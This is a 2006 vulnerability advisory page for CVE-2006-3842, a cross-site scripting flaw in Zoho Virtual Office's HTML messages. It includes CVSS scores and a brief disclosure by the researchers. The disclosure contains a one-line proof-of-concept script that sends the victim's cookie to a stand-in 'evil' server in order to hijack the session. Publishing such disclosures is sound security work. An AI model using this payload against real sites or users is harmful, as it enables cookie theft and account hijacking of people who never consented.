Cross Site Scripting Vulnerability in Zoho Virtual Office

2006.07.26

Credit: ss_team (ssteam pl gmail com)

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-3842

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Hello,
We have discovered a vunerability in Zoho Virtual Office.
Malformed HTML message could lead to XSS Attack. It can cause a cookie
theft leading to session hijacking.
PoC:
Simply creating HTML message including Javascript code could lead the
browser's frame into evil script on attacker's server.
Example:
<script>document.location='http://server/evil/evil.php?'+document.cookie
</script>
evil.php file contains code which saves cookie variables on evil server.
attacker can prepare cookie and hijack the user's session.
Affected version: 3.2 Build 3210 (latest), previous versions might
also be vulnerable.
Vendor was contacted 72 hours ago.
best regards
marc & shb

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Cross Site Scripting Vulnerability in Zoho Virtual Office

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.